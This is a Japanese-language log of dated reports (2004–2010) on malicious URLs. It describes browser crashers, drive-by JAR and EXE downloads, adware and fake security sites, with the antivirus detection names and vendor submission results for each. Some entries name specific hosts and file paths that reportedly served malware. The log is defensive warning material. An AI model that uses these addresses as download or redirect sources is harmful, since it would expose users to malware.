[2006/05/02] | 「当方のKAV5(カスペルスキー・アンチウイルス5)が Trojan.VBS.IFrame 反応を起こしました。
TELNETストームのブラウザクラッシャーです。ご注意。」 |
[2010/03/29] | 再確認。ウィルス名:HTML_CRINET.A |
[2010/03/29] | 他の方の結果は以下の「」内。
「不正コード・VBS/DDoS-iFrameNet検出しました。」 「Telnetストームというブラクラの一種です。 Telnetのコマンドプロンプト画面を同時に大量に開き、CPUやメモリのリソースがこれによって大量消費され、PCがフリーズしてしまいます。 現在一般のPCで Telnet 接続は通常使用しないので、PCに重大なエラーやダメージを残すことはないと思います。」 |
[2005/03/22] | 真っ白なページだが環境により、/freepics.jarを実行される。 |
[2005/03/22] | freepics.jarなる名のJARファイルが落ちてくるが、ウィルス名:JAVA_BYTEVER.Aを検出。 |
[2004/11/16] | ウィルス名:JAVA_BYTEVER.A。SPYBOT反応:XXXToolbar。 |
[2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
[2004/08/08] | //171203.com/java0/classload.jarが実行されるが、これがウィルス名:JAVA_BYTEVER.A。
他にVBScriptやexeの実行も有り。 |
[2004/10/03] | 現在は //www.coolsearch.biz/royal.htm に飛ぶ。 |
[2005/02/21] | 現在はウィルス反応無しの検索サイトを表示。 |
[2005/03/12] | 海外アダルトサイトだがウィルス名:JAVA_BYTEVER.A を検出。
これは //69.50.191.68/eb/be/count.html を読み込むため。 |
[2005/07/16] | jpg画像では無く、海外アダルトサイトで、ウィルス名:JAVA_BYTEVER.A を検出。 |
[2005/07/02] | jpg画像では無く、海外アダルトサイト。
ウィルス名:TROJ_ANICMOO.F+JAVA_BYTEVER.A 特にTROJ_ANICMOO.Fは連発して検出。 |
[2005/06/03] | ウィルス名:TROJ_ANICMOO.F |
[2004/05/04] | 環境によりスパイウェアの可能性。 |
[2005/07/29] | ウィルス名:Trojan Horse+Downloader.Trojan [ ノートン ]
ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A [ ウィルスバスター ] 画像掲示板だが、悪意ある投稿者により、ウィルス憑きURLを呼び出す書き込みがしてある。 この画像掲示板を閉じるとバスターがウィルス名:TROJ_ANICMOO.E を検出。 |
[2005/06/10] | ウィルス名:SPYW_MORWILBAR.A
真っ白なページだが、このセキュリティ警告 を表示。 「いいえ」を選択すれば無問題。「はい」を選択すると下のcabファイルを落とされる。 //morwillsearch.com/mwsearch.cab |
[2005/06/10] | 「mwsearch.dll」が2つ入っているが、ウィルス名:SPYW_MORWILBAR.A を検出。 |
[2009/01/24] | ウィルス名:TROJ_DLDR.AK として対応済。 |
[2005/07/31] | ウィルス名:JAVA_BYTEVER.A |
[2005/04/23] | 踏むと日本語のアダルトサイト。ここまで無害。動画がDLできるようだが、サムネイルをクリックすると「 movieCh.exe 」なるファイルがDLできる。
ewido でスキャンするとウィルス名:Trojan.KillFiles.u を検出。 また、以下のアンチウィルスソフトでもウィルスが検出された。ちなみにバスターは無反応。 mks_vir → ウィルス名:Trojan.Killfiles.U VBA32 → ウィルス名:Win32.Trojan.KillFiles.u |
[2005/05/02] | 「movieCh.exe」というファイルが落ちてくる。ノートン、バスター共に無反応だが、a-squaredでスキャンするとウィルス名:Trojan.Win32KillFiles.uを検出。 実行すると、ワンクリ業者にメールアドレスを抜かれる。 |
[2005/10/11] | 「fileMovies07532111102005.exe」という名のアプリケーションが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/Drop.HSP.a.1.A ArcaVir → Trojan.Killfiles.U ClamAV → Trojan.W32.Msbook F-Prot → dropper for W32/Trojan.YX Fortinet → Adware/HSP Kaspersky → Trojan-Clicker.Win32.HSP.a Norman Virus Control → W32/Agent.GBJ |
[2005/10/11] | 他の方の結果は以下。
「最終的にエロ動画が見れて、ノートンには引っかからなかったが、落としたファイルがexe形式だったり、いろいろあやしい。」 |
[2005/10/21] | 再確認。wmv動画ではなく、「fineMovies34370821102005.exe」が落ちてくる。
このexeにバスターがウィルス名:TROJ_CLICKER.DAを検出。 [2005/10/11]時にはバスター無反応だったが、10/11から今日までのパターンファイル更新のどれかによるものと思われる。 |
[2005/11/03] | 再確認。動画ではなく、「fineMovies27172302112005.exe」というアプリケーションが落ちてくる。
DLの途中でバスター反応。ウィルス名:TROJ_CLICKER.DA |
[2006/01/15] | 他の方の結果では「ウイルス反応あり。Trojan-Clicker.Win32.HSP.a 検出。」 |
[2006/01/20] | 他の方の結果では「Win32:Trojan-gen. {VC}というウイルスを検出(avast!)。ダウンロードしようとしたら.wmvではなく.exeでした。」 |
[2006/03/29] | 「動画も見れる。15秒程度のリゾード地の海岸と夕焼けの風景だがそれを見てる途中にこっそりexeファイルをダウンロードされる。そのexeからは TROJ_CLICKER.DA 反応がある。名前から察するに、おそらくQ2か国際電話用の、高額な料金を請求されるダイアラツールだろう。」 |
[2006/05/02] | 「何故かexeファイルが途中でDLされ、そのexeからは当方のKAV5でTrojan-Clicker.Win32.HSP.a反応がありました。」 |
[2006/05/02] | 「Kaspersky反応あり。Trojan-Spy.Win32.VB.ib 検出。」 |
[2007/01/12] | 2007/01/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.DPZ として検出するよう対応、とのこと。 実際に 2007/01/09 にDLしたファイルからウィルス名:TROJ_ZLOB.DPZ を検出することを確認。 しかし、今日改めて当該URLを調べてみるとバスター無反応。 2007/01/09 から今日までの間にファイルが置き換えられたと推測される。 |
[2007/05/28] | ウィルス名:TROJ_ZLOB.CHK |
[2007/04/16] | ウィルス名:TROJ_ZLOB.CWA |
[2006/01/20] | 海外アダルトサイトだが、ウィルス名:TROJ_ANICMOO.X を検出。
ソースを見るとIFRAMEタグで //game4all.biz/adv/111/ を呼び出している。 閉じると //search.drweb.bz/search?qq=sex の検索結果ページを表示。 |
[2004/02/05] | ウィルス名:TROJ_ISTBAR.K |
[2005/04/29] | ウィルス名:JS_PSYME.AF 。//www.googkle.com/ と同じ現象が起きる。詳細は //www.gookle.com/ のURL解説を参照。 |
[2005/06/16] | 404を確認。 |
[2005/04/29] | ウィルス名:JS_PSYME.AF 。アンチドートでもウィルス検出するらしい。
//www.googkle.com/ とほぼ同じだが、ウィルス検出窓を閉じると このセキュリティ警告 を表示。ActiveX で何かしかけてくる。 |
[2007/05/20] | 2007/02/19 にトレンドマイクロ社にファイルを提出。
2007/02/21 にその結果の連絡があり、ウィルス名:DIAL_BAUN.A として検出するよう対応、とのこと。 2007/02/19 にDLしたファイルが手元に無いため、実際に検出対応したかどうかは未確認。 しかも、今日改めて当該URLを確認してみると、404 になっていた。 |
[2005/11/17] | 踏むと こんな感じ のサイトだが、別窓が9枚あり、ブラクラ並に開く。何回確認しても9枚であった。
しかし、その9枚の別窓は、広告であったり、スクリーンセーバー勧誘であったりする。 |
[2006/09/15] | 2006/09/11 にトレンドマイクロ社にDL+解凍して現れた「MediaTicketsInstaller.ocx」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_MEDTICK.A として検出するよう対応した、とのこと。 2006/09/11 にDLしたファイルからウィルス名:ADW_MEDTICK.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_MEDTICK.A を検出することを確認。 |
[2004/12/03] | 洋エロサイトに行くが閉じるとspywareblasterの制限サイトを開こうとしてくる。
その制限サイトは//porn.mtree.com/streamate/index2.html |
[2007/05/19] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
2007/01/15 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2007/01/04 から今日までのファイルの置き換えは無いと推測される。 |
[2007/05/19] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
2007/01/15 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2007/01/04 から今日までのファイルの置き換えは無いと推測される。 |
[2007/05/19] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
2007/01/22 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2007/01/17 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2007/01/17 から今日までのファイルの置き換えは無いと推測される。 |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GST として検出するよう対応、とのこと。 実際に 2007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.GST を検出することを確認。 007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GSU として検出するよう対応、とのこと。 実際に 2007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.GSU を検出することを確認。 2007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GSV として検出するよう対応、とのこと。 実際に 007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.GSV を検出することを確認。 007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2008/09/21] | ウィルス名:TROJ_AGENT.ALWK |
[2005/12/03] | ファイルサイズ:41.7KB。DLまでバスター無反応。
メモ帳のアイコンをしたアプリケーションで、「リネージュ」というPCゲームに関するものらしい。 以下のアンチウィルスソフトで反応。 ArcaVir → Win32 BitDefender → BehavesLike:Win32.AV-Killer Dr.Web → Trojan.PWS.Lineage NOD32 → a variant of Win32/PSW.Lineage |
[2006/07/19] | ブラクラ。mailto画面やTELNET画面、メディアプレーヤー等が次々と立ち上がる。 |
[2008/12/28] | ウィルス名:TROJ_DLOAD.DN |
[2009/12/20] | ファイルサイズ:16.5 KB 。ウィルス名:TROJ_DROPPER.APJ |
[2009/12/20] | ファイルサイズ:56.5 KB 。ウィルス名:TROJ_DROPPER.JIJ |
[2009/12/20] | ファイルサイズ:16.0 KB 。ウィルス名:WORM_KOOBFACE.EM |
[2006/09/19] | ウィルス名:TROJ_CWS.AL |
[2006/09/19] | ウィルス名:TROJ_DLOADER.APL |
[2008/09/21] | ウィルス名:TROJ_SRIZBI.M |
[2008/12/28] | ウィルス名:TROJ_NUWAR.CYA |
[2008/10/26] | ソースを見ると、1秒後に以下のURLに飛ぶようになっている。確認すると、実際に以下のURLに飛んだ。
//72.232.11.210/~vladiman/img/index.php |
[2008/11/15] | DL+解凍すると、2つのファイルが現れるが、そのうちの「mof-package.exe」ファイルからウィルス名:Adware_BHOT_MusicOfFaith を検出。 |
[2008/12/28] | ウィルス名:TROJ_FAKEALER.EY |
[2006/04/13] | 他の方の結果は以下の「」内。
「MS06-001 WMF Exploit と Win32:Trojano-M [Trj] を検出。 「Listen Dude ! I want you to Press and hold keyboard button ENTER. 300.」というダイアログが出ますが押しても延々と出続けるので押しても意味は無いです。」 |
[2009/07/05] | ファイルサイズ:26.3 KB 。ウィルス名:CRYP_MANGLED |
[2005/12/14] | ウィルス名:BKDR_BN.311.EDS+BKDR_BIONET.310+BKDR_BIONET.311 |
[2005/12/14] | ウィルス名:BKDR_BO2K.10 |
[2005/12/14] | ウィルス名:TROJ_RUX.A |
[2005/12/14] | ウィルス名:TROJ_BIONET.84+BKDR_BIONET.84B |
[2005/04/17] | ウィルス名:PIXEL.740 |
[2005/04/17] | ウィルス名:WORM_CHOKE.A |
[2005/04/17] | ウィルス名:PE_Mtx.A |
[2008/07/28] | DL+解凍すると「34sd6rtey6.wmv.exe」なるファイルが現れる。2重拡張子である。
2008/07/16 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、ウイルスパターンファイル [5.415.00] にてウィルス名:BKDR_HUPIGON.SDX として検出するよう対応した、とのこと。 2008/07/16 にDLしたファイルからウィルス名:BKDR_HUPIGON.SDX を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:BKDR_HUPIGON.SDX を検出することを確認。 2008/07/16 から今日まではファイルは置き換えられていない、と推測される。 |
[2008/07/28] | 以下の他の方の結果を参照。
「ダウンロードしたファイルから、ウイルス名:Win32:Agent-AAPM を Avast が発見しました。」 「落してみると Kaspersky がウイルス名:Trojan.Win32.Inject.dzc を検出。」 |
[2009/05/18] | ファイルサイズ:15.0 KB 。ウィルス名:PAK_GENERIC.001 |
[2005/01/17] | FRAMEタグを使い、//www2.strangeworld.org/uedakana/sahra6138.jpg を呼ぶ。 |
[2009/12/20] | ファイルサイズ:56.5 KB 。多くのウィルス駆除ソフトで反応がある。高い確率で不正なプログラムと思われる。 |
[2004/08/22] | 以下の2chでの結果を参照のこと。
ハングルで書かれたページへ行く。虹絵が数点置いてあり、DLできるようだが、ソースチェッカーによると「HTML.Redlof.A」発見だが、IE直踏みではウィルス無反応。 エキサイトでページ丸ごと翻訳するとノートン先生大激怒、VBS.Redlof.A を検出。 DLして解凍したところ、ゲームのインストールができるが、インストールしてもゲームは起動せず。 また、DLすると画面の色がおかしくなる、との報告もあり。注意。 |
[2008/11/10] | 直踏みだと「install.exe」なるファイルが落ちてくる。
以下の2chでの結果を参照のこと。 「インストーラーをDL、実行してみると C:\Program Files に怪しげなフォルダと内容を生成。 中身を実行すると、なにやらボイスが聞こえて、(IEの)テンポラリファイルをスキャンし始めます。 ほぼ全てを問題有りとし、FIX nowを押すと削除し始めるようです。 無理矢理切って、その後同時に生成されたアンインストーラを起動すると一瞬のうちに消えました。 ウィルススキャンソフトというより、クリーナーソフト? なんにしても怪しげなので回避推奨。」 |
[2009/08/14] | こんな感じ のページを表示するが、すぐに別の海外アダルトサイトに飛ぶ。
稀に違う海外アダルトサイトに飛ぶ。 ここまでバスター無反応だが、他の方の結果では、アンチウイルスソフトが IFrame-GR 他多数の警告を出すこともあるらしい。 |
[2008/09/21] | ウィルス名:TSPY_BANKER.MIR |
[2008/09/21] | ウィルス名:TSPY_BANKER.LCZ |
[2005/12/10] | ウィルス名:SPYW_ADVKEYLOG.C |
[2009/12/20] | ファイルサイズ:249 KB 。ウィルス名:TROJ_SRIZBI.P |
[2006/10/03] | 2006/09/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DROPPER.CAC として検出するよう対応、とのこと。 2006/09/17 にDLしたファイルからウィルス名:TROJ_DROPPER.CAC を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DROPPER.CAC を検出することを確認。 |
[2006/10/03] | 他の方の結果は以下の「」内。
「単体では無反応でしたが、バラして Kaspersky/AOL で試験すると Trojan-Dropper.Win32.Agent.yd を内包しているようです。」 |
[2004/12/04] | 無限JavaScript。FDDアタック。//mypage.naver.co.jp/tostemer/sample/infinity_roop.htmlに飛ぶ。 |
[2004/12/04] | 無限JavaScript。FDDアタック。 |
[2009/01/24] | 2009/01/18 の時点では「IMG455.jpg-www.photo.com」という名前のMS-DOSアプリケーションファイルが落ちてきた。
このファイルについてはウィルス名:TROJ_DLDR.AJ として対応済にしてもらったが、今日改めて当該URLを確認してみると 404 になっていた。 |
[2008/08/14] | 「mysurfway-ie.reg」というレジストリファイルが落ちてくる。
バスター無反応だが、Kaspersky で not-a-virus:AdWare.WinREG.Surf.a を検出。 このファイルを実行するとIEの右クリックメニューに //mysurfway.net/ie.html を追加するらしい。 |
[2008/10/06] | 偽装セキュリティサイト。バスター無反応だが、 Kaspersky で Trojan-Downloader.JS.Agent.rn を検出するらしい。 |
[2007/03/07] | 2006/10/15 にトレンドマイクロ社にファイルを提出。
2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 しかし、今日改めて当該URLを見てみると404であった。 |